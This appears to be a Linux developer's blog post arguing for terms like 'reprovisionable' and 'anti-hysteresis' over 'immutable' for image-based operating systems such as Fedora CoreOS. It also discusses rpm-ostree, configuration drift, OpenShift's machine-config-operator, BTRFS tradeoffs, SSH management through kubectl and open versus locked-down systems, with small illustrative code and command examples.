“Immutable” → reprovisionable, anti-hysteresis

This is going to be a longer blog entry, but here’s a TL;DR:

I propose that instead of "immutable" or "read-only" when talking about operating systems (such as Fedora CoreOS, Google COOS, Flatcar etc.), we use these terms:

  • "fully managed": The system does not have "unmanaged state" – e.g. an admin interactively doing ssh and making changes not recorded declaratively somewhere else
  • "image based": Traditional package managers end up with a lot of "hidden state" (related to above); image based updates avoid that
  • "reprovisionable" and not a "pet": I don’t like the industry "pets vs cattle" term, and I think "reprovisionable" is both nicer and more descriptive
  • "Has anti-hysteresis properties": (Yes I know this is an awkward term) See https://en.wikipedia.org/wiki/Hysteresis – I’ll talk more about this later

(Terminology note: In this article I will also use the abbreviation "pkgmgrs" for "traditional package managers like apt/yum". Systems like NixOS and some aspects of swupd from Clear Linux improve parts of what I’m talking about, but this article is already really long, and a detailed comparison including those really deserves a separate post.)

Why not "immutable"/"read-only"?

Because it’s very misleading. These systems as a whole are not immutable, or read-only, or stateless – there are writable, persistent data areas. And more importantly, those writable data areas allow persistently storing privileged code. They have to, because these OSes need to support:

  • the user being root on their own computer
  • In place OS updates

(What about systems that don’t support "in place" updates? Yes, there are people/organizations who e.g. build a new cloud image for every change, and often don’t even enable ssh or any persistent writable state for the OS. This is fine, but one problem is that it doesn’t generally apply outside of cloud/IaaS environments, e.g. on bare metal machines, and it can make upgrades for small changes disproportionately expensive.)

Back to operating systems with state that some people call "immutable":

But /usr is read-only!

Yes. And this does have some security benefits, e.g. this runc vulnerability isn’t exploitable.

But in order for the operating system to be updated in place, there must be some writable area to add new OS content – so it’s not immutable. The details of this vary: a number of "image based" operating systems use dual partitions, while OSTree is based on hardlinking with a "hidden" writable data store.

The real reason to have a read-only /usr is to make clear that the content of that directory (the operating system binaries) is "fully managed" or "owned" by the OS creator – you shouldn’t try to overwrite or replace parts of it because those changes could be overwritten by a future update.

And this "changes in /usr being overwritten" is a real existing problem with traditional package-manager systems (pkgmgrs). For example, a while ago I was looking at Keylime and came across this bit in the installer. That change would be silently overwritten by the next yum/apt update, so the system administrator experience would be:

  • Provision system
  • Install things (including keylime)
  • ⌛ Time passes
  • Apply OS updates (not on by default), then keylime breaks for a non-obvious reason

The more correct thing would instead be for that playbook to write a systemd drop-in in /etc to override just ExecStart=, although even doing that is fragile, and what’d be best here is to make this an explicitly configurable option for tpm2-abrmd in a config file in /etc.
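To make the drop-in idea concrete, here is a minimal sketch written as a small Python helper so it can be tried against a scratch directory rather than a real /etc. The unit name, the drop-in file name and the replacement command line used in the usage note are assumptions for illustration, not what the Keylime installer actually needs. The one piece of standard systemd behaviour it relies on is that an empty ExecStart= line clears the command inherited from the unit shipped in /usr before a new one is set.

```python
from pathlib import Path


def render_dropin(exec_start: str) -> str:
    """Return drop-in text that overrides only ExecStart= for a service."""
    # The empty ExecStart= resets the command list inherited from the unit
    # shipped in /usr; the following line sets the replacement command.
    return f"[Service]\nExecStart=\nExecStart={exec_start}\n"


def write_dropin(etc_root: Path, unit: str, name: str, exec_start: str) -> Path:
    """Write <etc_root>/systemd/system/<unit>.d/<name> and return its path."""
    dropin_dir = etc_root / "systemd" / "system" / f"{unit}.d"
    dropin_dir.mkdir(parents=True, exist_ok=True)
    target = dropin_dir / name
    target.write_text(render_dropin(exec_start))
    return target
```

Calling write_dropin(Path("/etc"), "tpm2-abrmd.service", "50-keylime.conf", "<new command line>") followed by systemctl daemon-reload would leave /usr untouched, so a later package update cannot silently undo the change.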

The overall point is that the reason /usr is read-only is primarily to enforce that user configuration is cleanly separate from the OS content – which becomes particularly important when OS updates are automatic by default, as they are in Fedora CoreOS.

I think having automatic updates on by default fundamentally changes the perception of responsibility around updates; if I’m a system administrator and I typed apt/yum update and things broke, it’s my fault, but if automatic updates are on by default and I’m doing something else and the machine just falls over – it’s the OS vendor’s fault. Linking these two together: Since Fedora CoreOS has automatic updates on, we really need to be clear what’s our responsibility and what’s yours.

Now, this isn’t a new problem, and most people maintaining systems know not to do the kinds of things that Keylime Ansible playbook is doing. But it’s an extremely easy mistake to make without strong discipline when /usr is sitting there writable by any process that runs as root. I’ve seen many, many examples of this.

Nothing actually stops traditional package managers from mounting /usr read-only by default – they could do the equivalent of unshare -m /bin/sh -c 'mount -o remount,rw /usr && apt update' internally. But the challenges there grow into adjusting the rest of the filesystem layout to handle a read-only /usr, such as how OSTree suggests moving /usr/local to /var/usrlocal etc.

Image based updates

Usually instead of talking about an "immutable" system that allows in place updates, it’d be more useful and accurate to say "image based".

And this gets into another huge difference between traditional package managers and image based systems: The amount of "internal state".

The way most package managers work is that when you type $pkgmgr install foo, the fact that you want foo installed is recorded by adding it to the database. But the package manager database also includes a whole set of "base packages" that (usually) you didn’t choose. Those "base packages" might come from a base container image when you podman/docker pull; for cloud images they come from the default image; and for physical systems they often come from a distribution-specific default list embedded in or downloaded from the ISO or equivalent.

A problem with this model then is "drift" – if the distribution decides to add a package to the base set, you (usually) don’t get it when applying in place updates, since most package managers just update the set of packages you already have. One solution to this is metapackages, but if not everything in the base is covered you still have drift that can be hard to notice over time.
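The drift described above can be sketched as plain set arithmetic. This is only a model under stated assumptions: the three package sets are inputs you would have to collect yourself (no real package manager API is used), and the package names in the usage note are made up for illustration.

```python
def base_drift(original_base: set[str], current_base: set[str],
               installed: set[str]) -> dict[str, set[str]]:
    """Compare an in-place-updated system against the distribution's current base set."""
    return {
        # Added to the base after provisioning; in-place updates never pulled them in.
        "missing_from_system": current_base - installed,
        # Dropped from the base since provisioning but still installed here.
        "left_over_on_system": (original_base - current_base) & installed,
    }
```

For a machine provisioned from a base of {"bash", "chrony", "ntp"} that now has {"bash", "chrony", "ntp", "tmux"} installed, while the distribution's base has become {"bash", "chrony", "zram-generator"}, the function reports zram-generator as missing and ntp as left over. A freshly provisioned machine would report neither, which is the point: two machines at the "same version" differ depending on when they were installed.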

I think for users of many pkgmgrs this "initial state" is hard to disentangle from things you typically do care about, like the packages you chose to install. There are e.g. the apt-mark showmanual and dnf history userinstalled commands.

And…trying that out by pulling the docker.io/debian:stable image, it claims:

# apt-mark showmanual
iproute2
iputils-ping
#

And that’s the first command I ran in the image! Clearly a bug somewhere. For the fedora:32 base image it lists a bunch of packages that correspond to the bits in the base kickstart – but that’s not something I as the user wrote.

By analogy with /usr vs /etc – this is like mixing local configuration in /usr.

This problem extends beyond the "user installed" database: traditional package managers aren’t aware of the "base bootimage" which operates on a separate infrastructure layer. apt has no idea about the OpenStack image/AMI/qcow2 or whatever that formed its initial state, nor is it aware of the OCI/docker container initial image (and conversely, e.g. podman/docker have no idea that yum/apt etc. are running inside).

So over time, the state of the system with traditional pkgmgrs is a function of many things:

  • Which packages you chose to install (obviously)
  • The set of packages from the initial "bootimage" or container image
  • More subtle things like which packages are in the "user installed" database
  • Even more subtle things can happen when weak dependencies like Recommends change in upstream packages
  • The package manager version: RHEL8 yum has autoremove on by default, RHEL7 and older yum doesn’t

One solution to this type of "drift" is to not use packages at all (pure "base OS" + "apps/containers") like Google COOS, or to group things at a higher level (Clear Linux is more in this bucket).

I’m pretty happy though with the design we came up with for rpm-ostree used by Fedora CoreOS/Silverblue/IoT; there is a clear "base commit" that comes in OSTree format, and you can add packages on top – recasting RPMs as "operating system extensions" (see also this OpenShift enhancement).

For rpm-ostree it’s really simple – by default it operates in pure ostree mode, so if you don’t layer/override any packages you are exactly replicating an ostree commit – and that’s it! You don’t need to think about packages by default.

Particularly for Fedora CoreOS, there is almost nothing in the "bootimage" (ISO, AMI equivalent) that isn’t part of the ostree commit.

In other words, "state of installed software" is a function of (effectively) one thing by default:

  • The ostree commit

It’s even stronger than that really, it’s not just "same packages" it’s "bit for bit identical /usr filesystem". However, there is one important note: /boot does come from the bootimage, see this issue.

Bootloader aside, effectively all of the OS state you care about then does not depend on which bootimage you happened to use to install initially. When OSTree performs an update, it does not matter what the "previous" commit was – the old and new implicitly share files via the hardlink store, but updates always involve a "fresh checkout" of the new commit. Every upgrade is like a fresh OS install of that version with your configuration (/etc) and state (/var) re-applied.
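As a toy model of "shared hardlink store plus fresh checkout", the sketch below stores each file once under its SHA-256 digest and builds every deployment as a brand new directory of hardlinks. It is not OSTree’s actual on-disk format or API; the function names and the flat object directory are assumptions made for the example.

```python
import hashlib
import os
from pathlib import Path


def store_object(repo: Path, content: bytes) -> Path:
    """Store content once, named by its SHA-256 digest."""
    obj = repo / hashlib.sha256(content).hexdigest()
    if not obj.exists():
        obj.write_bytes(content)
    return obj


def checkout(repo: Path, commit: dict[str, bytes], dest: Path) -> None:
    """Build a fresh tree for `commit` by hardlinking files out of the store."""
    for relpath, content in commit.items():
        target = dest / relpath
        target.parent.mkdir(parents=True, exist_ok=True)
        # The new tree never looks at any previous deployment; unchanged
        # files are shared only because they resolve to the same object.
        os.link(store_object(repo, content), target)
```

Checking out two commits that differ in one file yields two complete trees that share an inode for every unchanged file. Because the trees share inodes, this only stays correct if nothing edits a checked-out file in place, which fits with /usr being read-only.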

With rpm-ostree being a hybrid system, you can choose to engage package layering (or overrides). But the system very clearly highlights that list; note a major simplification is combining the "packages you installed" and "user installed" lists. The rpm-ostree model is very simple: you have a "base commit/image" and your extensions. For example:

$ rpm-ostree status -b
State: idle
BootedDeployment:
● ostree://fedora/32/x86_64/silverblue
                   Version: 32.2 (2020-08-22T17:28:53Z)
                BaseCommit: 080312021f34c7763089ff12fcd2964647e0f55ac3981f869b56d232a33990f6
           LayeredPackages: fish libvirt tmux virt-manager

An important but subtle detail in achieving this simplification: by default, rpm-ostree doesn’t allow marking a base package as user installed. Generally the idea is that removing user-interesting packages from the base image is something you shouldn’t do.

rpm-ostree goes to some lengths internally to make this split happen; the libdnf/rpm layers don’t have any model of "base image" because everything’s a package to them.

Has anti-hysteresis properties

I know "has anti-hysteresis properties" is an awkward phrase (and I’m happy to hear alternatives) but I think hysteresis is a great term that we should start using in computing. Today it seems to mostly be used in the sciences but I propose adopting it – this in the spirit of making computer science more like a real science.

Let’s take a look specifically at elastic hysteresis because it’s easy to understand and even try at home.

Basically, rubber bands have "hysteresis" ("hidden state"/"memory") which comes from how much they were stretched in the past. And this state is basically impossible to see by just looking at the rubber band. For a related example with rubber, see the two balloon experiment.

To tie together the previous section on package managers with this:

Systems managed by traditional package managers (apt/yum/etc) have a lot of effective hysteresis. I think even many experienced system administrators would have trouble confidently and precisely explaining how the multiple things listed above (the container or IaaS base image, package manager user installed database, etc.) all interact in forming the final state of the system over time as in-place upgrades are applied.

Configuration management systems and hysteresis

This "hysteresis" problem occurs not just in package managers but also many configuration management systems (puppet/ansible/etc).

A simple example I’ve seen happen is where the system administrator writes a playbook (or equivalent) that does e.g.:

- name: Allow nopasswd for wheel
  lineinfile:
    path: /etc/sudoers
    state: present
    regexp: '^%wheel ALL='
    line: '%wheel ALL=(ALL) NOPASSWD: ALL'

Then later, say the organization wants to change to use a separate group instead of wheel, say admin or whatever.

If the playbook is changed in git to do:

- group:
    name: admin
    state: present
- name: Allow nopasswd for admins
  lineinfile:
    path: /etc/sudoers
    state: present
    regexp: '^%admin ALL='
    line: '%admin ALL=(ALL) NOPASSWD: ALL'

The previous change to modify wheel in /etc/sudoers will silently persist (until the system is reprovisioned). And that could become a security problem even in this case.

In most of these configuration management systems, in some cases the admin may need to explicitly add a change which reverts a prior change, and then makes the new change. But not all of the time – some (most) changes don’t need this.

It’s an easy mistake to make when writing effectively arbitrary code to change files in persistent filesystems.

Hence, configuration management systems are subject to hysteresis too, and I think many of them could do better in warning users about this, and pushing for better practices. For example, the playbook would be more "anti-hysteresis" if it wrote to /etc/sudoers.d/mycustom.conf which gets replaced entirely, though /etc/sudoers.d is only supported by relatively modern sudo I think.
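The difference between the two approaches can be sketched in a few lines of Python. The lineinfile function here is a deliberately simplified model of a "make sure this line is present" edit (replace the last matching line, otherwise append), not Ansible’s implementation, and the dictionary of files stands in for a real filesystem.

```python
import re


def lineinfile(text: str, regexp: str, line: str) -> str:
    """Simplified 'line present' edit: replace the last match, else append."""
    lines = text.splitlines()
    matches = [i for i, existing in enumerate(lines) if re.search(regexp, existing)]
    if matches:
        lines[matches[-1]] = line
    else:
        lines.append(line)
    return "\n".join(lines) + "\n"


def replace_file(files: dict[str, str], path: str, content: str) -> dict[str, str]:
    """Whole-file management: the file holds exactly what the current playbook says."""
    updated = dict(files)
    updated[path] = content
    return updated


WHEEL = "%wheel ALL=(ALL) NOPASSWD: ALL"
ADMIN = "%admin ALL=(ALL) NOPASSWD: ALL"

# Line-based edits: apply playbook v1, then playbook v2, to the same file.
sudoers = "root ALL=(ALL) ALL\n"
sudoers = lineinfile(sudoers, r"^%wheel ALL=", WHEEL)
sudoers = lineinfile(sudoers, r"^%admin ALL=", ADMIN)

# Whole-file drop-in: v2 simply overwrites what v1 wrote.
files = replace_file({}, "/etc/sudoers.d/mycustom.conf", WHEEL + "\n")
files = replace_file(files, "/etc/sudoers.d/mycustom.conf", ADMIN + "\n")
```

After both runs, sudoers still contains the wheel rule from v1, while the drop-in contains only the admin rule. The final state of the first file depends on the history of playbooks applied; the final state of the second depends only on the current one.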

Kubernetes is fairly opinionated in having code in container images you pull (equivalent of /usr), and storing configuration in a configmap (which would get projected into environment variables or files in /etc). When you update a deployment, all state in the (sadly writable by default) pod container filesystem is thrown away, and there’s also no leakage from any previous version of a configmap. So we could say that the Kubernetes approach to applications has strong "anti-hysteresis properties".

The OpenShift Machine Config Operator defaults to anti-hysteresis

Tying together the Kubernetes and operating system threads: in OpenShift 4, the machine-config-operator allows you to write config files and systemd units into the operating system /etc by using kubectl/oc. (The original goal of etcd was in fact to do this, then Kubernetes happened and the focus shifted to that layer. In OpenShift 4 we are meeting that original goal of storing the Unix /etc in etcd via the MCO.)

The reason I claim the MCO has "anti-hysteresis" is it keeps track of the old and new system states reliably and is able to diff them. For example, if you write a config file for chrony to set the timeserver, then later kubectl delete machineconfig/my-chrony-config since you’re fine with the default, the MCO will notice that the old config wrote /etc/chrony.conf and the new one doesn’t, and it will correctly revert the file back to the default.
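A rough sketch of that diffing idea, assuming each rendered configuration can be modelled as a mapping from path to file content. This is not the MCO’s code; plan_changes, the defaults mapping and the file contents in the usage note are hypothetical names and values chosen for the example.

```python
from typing import Optional


def plan_changes(old: dict[str, str], new: dict[str, str],
                 defaults: dict[str, str]) -> dict[str, Optional[str]]:
    """Return path -> content to write, or None when the file should be removed."""
    plan: dict[str, Optional[str]] = {}
    for path, content in new.items():
        if old.get(path) != content:
            plan[path] = content
    for path in old.keys() - new.keys():
        # No longer managed: restore the OS default if there is one, else remove.
        plan[path] = defaults.get(path)
    return plan
```

With old = {"/etc/chrony.conf": "<custom timeserver config>"}, new = {} and a defaults mapping that knows the stock /etc/chrony.conf, the plan is to write the stock content back. The important property is that the plan is computed from the old and new declared states, so nothing from the old state can linger just because the new state no longer mentions it.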

Just like OSTree has a checksum describing the state of /usr, the MCO maintains a checksum for its state and when you look at a node, you can say its configuration is e.g. rendered-master-<checksum>. If a system can describe its state with a checksum, that implies it has strong anti-hysteresis properties.
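To illustrate why "describable by a checksum" is such a strong property, here is a minimal sketch that hashes a set of managed files in a canonical order. It is an assumption-laden toy, not how OSTree or the MCO actually compute their checksums; the only claim is that two systems with the same digest were given the same managed content, regardless of the order in which changes arrived.

```python
import hashlib


def state_checksum(files: dict[str, str]) -> str:
    """Digest of a managed file set, independent of insertion order."""
    digest = hashlib.sha256()
    for path in sorted(files):
        # Length-prefix each field so ("ab", "c") and ("a", "bc") hash differently.
        for field in (path, files[path]):
            data = field.encode()
            digest.update(len(data).to_bytes(8, "big"))
            digest.update(data)
    return digest.hexdigest()
```

Anything that is not an input to the function (an ssh session that edited a file by hand, a unit that wrote somewhere else) is by definition outside the checksum, which is exactly the "unmanaged state" to watch for.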

Now, there are holes in this model. If for example instead of writing a file directly, you create a systemd unit which does e.g. ExecStart=/bin/sh -c 'echo somedata > /etc/someotherfile' (the shell is needed because systemd itself does not interpret redirections), and you later delete that unit – the file will persist. The reason why relates to this FAQ.

A general pattern here is that any place you have arbitrary code that changes over time writing to persistent files, you’re at risk of hysteresis (or "unmanaged state").

Reprovisionable

OK, so systems with anti-hysteresis properties are good. But in practice, I think there’s always going to be that small amount of "unmanaged state" that sneaks in even in organizations with strong discipline. For example, a system administrator trying to debug one node and using ssh to edit a file directly to increase the debug level of a service, and then later that causes a problem by flooding the log system or causing more I/O to the local filesystem and increasing latency for other services.

And this problem isn’t just at the operating system layer; at the IaaS/CaaS layer it’s easy to have VMs or containers that were created manually to debug something and then "leak" unless actively removed.

In an IaaS deployment there are a wide variety of objects in general (storage buckets, SaaS etc.) and equally many tools to deal with leaks at that level; usually this boils down to a "resource tagging" approach. (One thing I think is nice about GCP over e.g. AWS is the "project" approach, specifically this bit: "This model can also be useful for testing purposes: once you’re done with a project, you can delete the project, and all of the resources created by that project will be deleted as well.")

At the operating system level (and at the IaaS level if you can too), I think a good way to deal with this is to periodically reprovision, e.g. once a month (if you can do faster, great) on a rolling basis. In OpenShift 4 for example with the machine-api-operator that would just be a small amount of code (a custom controller running as a pod) to periodically kubectl delete machine/<somemachine> based on whatever criteria you want – the platform will handle the rest, spinning up a new one to take its place. Currently this only applies to workers but I hope we can cover the control plane in future releases. A neat thing about this is that the IaaS layer objects (virtual machines) are just Kubernetes custom resources that are managed via the cluster.
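The selection logic for such a controller could be as small as the sketch below. It assumes you already have a mapping of machine name to creation time (how you obtain it, and how you issue the delete, is left out on purpose); the function name, the 30-day default and the batch size are illustrative choices, not anything OpenShift prescribes.

```python
from datetime import datetime, timedelta


def machines_to_reprovision(created: dict[str, datetime], now: datetime,
                            max_age: timedelta = timedelta(days=30),
                            batch: int = 1) -> list[str]:
    """Pick up to `batch` machines older than `max_age`, oldest first."""
    expired = [name for name, ts in created.items() if now - ts > max_age]
    expired.sort(key=lambda name: created[name])
    # Limiting the batch keeps the rollout "rolling" rather than all at once.
    return expired[:batch]
```

Each name returned would then be handed to the equivalent of kubectl delete machine/<name>, and the platform replaces it. Keeping the batch small means capacity only dips by a machine or two at a time.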

Conclusion: We want reprovisionable, anti-hysteresis systems

There are a whole lot of current terms for what I’ve covered above: "gitops", "managed configuration", "cattle", "stateless", "immutable infrastructure" etc. I’m suggesting the goal is: reprovisionable infrastructure with anti-hysteresis properties. But, I’d also be happy if we used "reprovisionable" instead of "cattle", and also if we introduced the term "anti-hysteresis" instead of "immutable" (where applicable).

On BTRFS

There’s been a lot of discussion on this proposed Fedora change for Workstation to use BTRFS.

First off, some background: I reprovision my workstation about every 2-3 months to avoid it becoming too much of a "pet". I took the opportunity for this reprovision to try out BTRFS again (it’d been years).

Executive summary

BTRFS should be an option, even an emphasized one. It probably shouldn’t be the default for Workstation, and shouldn’t be a default beyond that for server use cases (e.g. Fedora CoreOS).

Why are there multiple Linux filesystems?

There are multiple filesystems in the Linux kernel for good reasons. It’s basically impossible to optimize for all use cases at once, and there are fundamental tradeoffs to make. BTRFS in particular has a lot of features…and those features have costs. Not every use case needs those features, and the costs can be close to prohibitive for things like databases.

BTRFS is good for "pet" systems

There is this terminology in the industry of pets vs cattle – I once saw a talk that proposed "elephants vs ants" instead which is more appealing. Lately I tend to use "disposable" or "reprovisionable" for the second term.

I mentioned above I reprovision my workstation periodically, but it’s still somewhat of a "pet". I don’t have everything in config management yet (and probably never will); I change things often enough that it’s hard to commit to 100% discipline to record every change in git instead of just running a CLI or writing a file. But I have all the important stuff. (And I take backups of data separately of course.)

For people who don’t have much in configuration management – the server or desktop system that has years of individually built up changes (whether from people doing things manually over ssh or interactively via a GUI like Cockpit) – being able to take a filesystem snapshot of things is an extremely compelling feature.

Another great BTRFS-style use case is storing data like your photos on local drives instead of uploading them to the cloud, etc.

The BTRFS cost

Those features though come at a cost. And this goes back to the "pets" vs "disposable" systems and where the "source of truth" is. For users managing disposable systems, the source of truth isn’t the Unix filesystem – it’s most likely a form of GitOps. Or take the case of Kubernetes – it’s a cluster with the primary source being etcd.

And of course people are using storage systems like PostgreSQL or Ceph for data, or an object storage system.

The important thing to see here is that in these cases, the "source of truth" isn’t a single computer (a single Unix filesystem) – it’s a distributed cluster.

For all these databases, performance is absolutely critical. They don’t need the underlying filesystem to do much other than pass through writes to disk, because they are already managing things like duplication/checksumming/consistency at a higher level.

As most BTRFS users know (or have discovered the hard way) you really need to use nodatacow for these – effectively "turning off" a lot of BTRFS features.

Another example is virtual machine images, which is an interesting one because the "pet" vs "disposable" discussion here becomes recursive – is the VM a pet or disposable, etc.

Not worth paying for reprovisionable systems

For people who manage "reprovisionable" systems, there’s usually not much value using BTRFS for things like operating system data or /etc (they can just blow it away and reprovision), and a clear cost where they need to either use nodatacow on the things that do matter (losing a lot of the BTRFS features for that data), or explicitly use e.g. xfs/ext4 for them, going back into a world of managing "mixed" storage.

In particular, I would strongly argue against defaulting to BTRFS for Fedora CoreOS because we are explicitly pushing people away from creating these types of "pet" systems.

To say this another way, I’ve seen some Internet discussion that reads the proposed change as applying beyond Fedora Workstation, and that’s wrong.

But if you e.g. want to use BTRFS anyways for Fedora CoreOS (perhaps using a separate subvolume for /var, where persistent container data is stored, that would be mounted with nodatacow for things like etcd), that could make sense! We are quite close to finishing root filesystem reprovisioning in Ignition.

But a great option if you know you want/need it!

As I mentioned above, my workstation (FWIW a customized Silverblue-style system) seems like a nearly ideal use case for BTRFS. I’m not alone in that! I’m likely going to roll with it for a few months until the next reprovisioning time unless I hit some stumbling blocks.

However, I am already noticing the Firefox UI periodically lock up for seconds at a time, which wasn’t happening before. Since I happen to know Firefox uses SQLite (which, like the other databases mentioned above, conflicts with btrfs), I tried this and yep:

walters@toolbox> find ~/.mozilla/ -type f -exec filefrag {} \; | grep -Ee '[0-9][0-9][0-9]+ extents found'
firefox/xxxx.default-release/storage/.../xxxx.sqlite: 1825 extents found
...

And that’s only a few days old! (I didn’t definitively tie the UI lockups to that, but I wouldn’t be surprised. I’d also hope Firefox isn’t writing to the database on the main thread, but I’m sure it’s hard for the UI to avoid blocking on some queries).
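If you want to keep an eye on this over time, the grep above can be turned into a small parser. This sketch assumes filefrag’s usual one-line-per-file summary ("path: N extents found"); the threshold of 100 mirrors the three-or-more-digits pattern in the grep and is otherwise arbitrary.

```python
import re

# Matches filefrag summary lines such as "foo.sqlite: 1825 extents found".
_EXTENTS = re.compile(r"^(?P<path>.*): (?P<count>\d+) extents? found$")


def fragmented(filefrag_output: str, threshold: int = 100) -> list[tuple[str, int]]:
    """Return (path, extents) pairs at or above `threshold`, most fragmented first."""
    hits = []
    for line in filefrag_output.splitlines():
        match = _EXTENTS.match(line.strip())
        if match and int(match["count"]) >= threshold:
            hits.append((match["path"], int(match["count"])))
    return sorted(hits, key=lambda item: item[1], reverse=True)
```

Feeding it the output of the find command above gives a sorted list of the worst offenders, which is a reasonable starting point for deciding which files (if any) deserve nodatacow or a periodic defragment.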

I just found this stackoverflow post with some useful tips around manually or automatically defragmenting but…it’s really difficult to say that all Fedora/Firefox users should need to discover this and make the difficult choice of whether they want BTRFS features or performance for individual files after the fact. Firefox upstream probably can’t unilaterally set the nodatacow option on their databases because some users might reasonably want consistent snapshots for their home directory. A lot of others though might use a separate backup system (or Firefox Sync) and much prefer performance, because they can just restore their browser state like bookmarks/history from backup if need be.

Random other aside: sqlite performance and f2fs

In a tangentially related "Linux filesystems are optimized for different things" thread, the f2fs filesystem mostly used by Android (AFAIK) has special APIs designed specifically for SQLite, because SQLite is so important to Android.

Conclusion

All Fedora variants are generic to a degree; I don’t think there will ever be just one Linux filesystem that’s the only sane choice. It makes total sense to have BTRFS as a prominent option for people creating desktops (and laptops and to a lesser degree servers).

The default however is an extremely consequential decision. It implies many years of dealing with the choice in later bug reports, etc. It really requires a true commitment to that choice for the long term.

I’m not sure it makes sense to push even Linux workstation users towards a system that’s more "pet" oriented by default. How people create disposable systems (particularly for workstations) is a complex topic with a lot of tradeoffs; I’d love for the Fedora community to have more blog entries about this in the Magazine. One of those solutions might be e.g. using a BTRFS root and using send/receive to a USB drive for backups for example!

But others would be about the things I and others do to manage "disposable" systems: managing data in /home in git, using image systems like rpm-ostree for the base OS to replicate well known state instead of letting their package database be a "pet", storing development environment as a container image etc. Those work on any Unix filesystem without imposing any runtime cost. And that’s what I think most people provisioning new systems in 2020 should be doing.

Controlling ssh via kubectl

In a recent conversation, an OpenShift 4 administrator used the phrase “Because SSH is disabled in these AMIs…”.  But that’s not the right way to think about things!  With OpenShift 4, the goal is that all aspects of the operating system are controlled by the cluster and one can configure them in a uniform fashion “day 1” and “day 2” via kubectl/oc.

Let’s unpack this a bit more.  First, with Fedora/RHEL CoreOS, we have a high degree of uniformity for the base OS across platforms – for example, we avoid including any platform specific agents, and we also try really hard to have the OS work the same way across platforms because while we have different disk images per platform (unavoidable), we have exactly one in-place update stream that applies across all of them.

The state of having SSH enabled or not does not vary across platforms or “AMIs” – it works exactly the same on a bare metal OpenShift 4 install as it does in AWS.

Second, we use Ignition and the machine config operator as a uniform way to configure things – so if you want to enable or disable SSH or configure keys – it again works exactly the same across platforms.

Specifically, if you provide SSH public keys to the installer configuration that basically ends up generating an Ignition config that applies on firstboot – the “AMI” here isn’t relevant.
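For a sense of what that looks like, here is a minimal sketch that renders an Ignition config carrying SSH keys. The spec version ("3.0.0"), the core user and the key shown in the usage note are assumptions for illustration; the config the OpenShift installer actually generates contains much more and may target a different spec version.

```python
import json


def ignition_with_ssh_keys(keys: list[str], user: str = "core") -> str:
    """Render a minimal Ignition config that authorizes `keys` for `user`."""
    config = {
        "ignition": {"version": "3.0.0"},
        # passwd.users[].sshAuthorizedKeys is where Ignition takes public keys.
        "passwd": {"users": [{"name": user, "sshAuthorizedKeys": keys}]},
    }
    return json.dumps(config, indent=2)
```

Calling ignition_with_ssh_keys(["ssh-ed25519 AAAAexamplekey admin@example.com"]) (a placeholder key) produces the same JSON whether the machine then boots on AWS, OpenStack or bare metal, which is the point being made here: the keys travel in the config, not in the disk image.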

This part of “configure the OS via Ignition” is common to Fedora and RHEL CoreOS.  With OpenShift 4 we also have integrated “day 2” changes, so one can e.g. update SSH keys “day 2”.

To emphasize this, as an OpenShift 4 administrator, you manage your ssh keys via oc/kubectl –  the same way you manage other aspects of the cluster, and the same way across platforms.

Starting from open (and FOSS)

As our society becomes increasingly dependent on computing, the importance of security has only risen. From cities hit by ransomware attacks, to companies doing cutting edge research that are the targets of industrial espionage, to individuals attacked because they have a desirable social media handle or are famous – security is vital to all of us.

When I first got into Linux and FOSS, its flexibility enabled a variety of things that I still have strong memories of. For example, the first year of college in my dorm room with 3 other people, we only had a shared phone line that we could use with a modem (yes, I’m old). A friend of a friend ended up setting up a PC Linux box as a NAT system, and the connection was certainly slow, but it worked. I think it ran Slackware. That left an impression on me. (Though the next year the school deployed Ethernet anyways.)

Fast forward 20+ years, we have the rise of the cloud (and cheap routers and WiFi of course). But something also changed about Linux (and operating systems in general) in that time, and that’s the topic of this post: “locked down” operating systems, of which the most notable here are iOS, Android and ChromeOS.

iOS in particular requires code signing – the operating system refuses to execute code not signed by Apple. And iOS devices can only run iOS of course.

ChromeOS is also a locked-down system by default: while it uses the Linux kernel, it also comes out of the box set up such that the base operating system only runs the binary ChromeOS builds which come entirely from Google. This is implemented with dm-verity. Android also uses the Linux kernel and has a similar setup, although the story of who owns what is more complicated; a bit more on this below.

Now, ChromeOS has a documented developer mode – and in fact they’ve made this process easier than it used to be (previously it could require toggling a hardware switch, which also reset the device if I remember correctly). Android has documented bootloader unlocking, although (again as I understand it) many popular phones come locked.

In contrast to these types of systems we have the “traditional” Linux distributions, the BSDs, etc. Most Linux distributions are strongly associated with a “package manager” – which makes it fast and easy to add software to your root filesystem.

The flip side of course, is it’s also fast and easy for malicious code to end up in your root filesystem (or home directory) if you’re running a vulnerable web browser or service, or you pull from untrusted sources, etc. Particularly if you aren’t diligent with upgrades.

Another way to look at this is – the ChromeOS docs talk about “installing Linux”. On the face of it, this sounds silly because ChromeOS is a Linux kernel…but it’s not the flexible Linux that I first encountered in college. It’s not the flexible Linux that people use to create custom devices.

I think we need to incrementally move the “mainstream” distributions closer to this model – while preserving the fundamental open nature of the system. This will not be easy; in practice it’s a difficult balance to strike, but we can do it.

Partition (containerize/virtualize)

The mainstream default needs to be containers and virtual machines. This is obviously well understood, but doing it in practice is really an enormous shift from how “traditional” default Debian/RHEL/Slackware/Arch installs work.

In most of the Fedora documentation, it’s extremely common to reference sudo yum install.

Getting out of the mindset of routinely mutating your root filesystem is hard. For people used to a “traditional” Linux system, partitioning into containers and VMs is hard. Changing systems management tools to work in this model is extremely hard. But we need to do it.

On the server side the rise of Kubernetes increasingly does mean that containerization is the default. For OpenShift 4 we created a derivative of Fedora CoreOS in Red Hat Enterprise Linux CoreOS – I like to describe it as a “Kubernetes-native OS” in concert with the machine-config-operator.

For other use cases, we’re doing our best to push the ecosystem in this direction with Fedora CoreOS (container oriented server but not Kubernetes native; e.g. can be used standalone) and other projects like the desktop-focused Fedora Silverblue. (On the topic of partitioning the desktop, QubesOS is also doing interesting, mostly complementary work)

One of the biggest shifts to make particularly for desktop systems like Silverblue is to live inside a “pet container” system like toolbox.

When I see documentation that says yum install foo – I now default to doing that inside my toolbox container – or sometimes on a remote Kubernetes pod. This works well for CLI applications.

But remain open

What we’re not changing with Fedora CoreOS (or other projects) is a “default to open” model. We will not (by default), for example, require that code executing on your device be signed by us. Our source code and build systems are Free Software and will remain that way. We will continue to discuss and write patches in the open, and ensure that we’re continuing to build an operating system in open collaboration with our users.

Today for example, rpm-ostree supports easily replacing the kernel; you just run rpm-ostree override replace /path/to/kernel.rpm. Also, the fact that it’s the same kernel package as “traditional” Fedora installs cannot be emphasized enough – it helps us sustain two different ways to consume the same OS content. We can’t just break non-containerized use cases overnight.

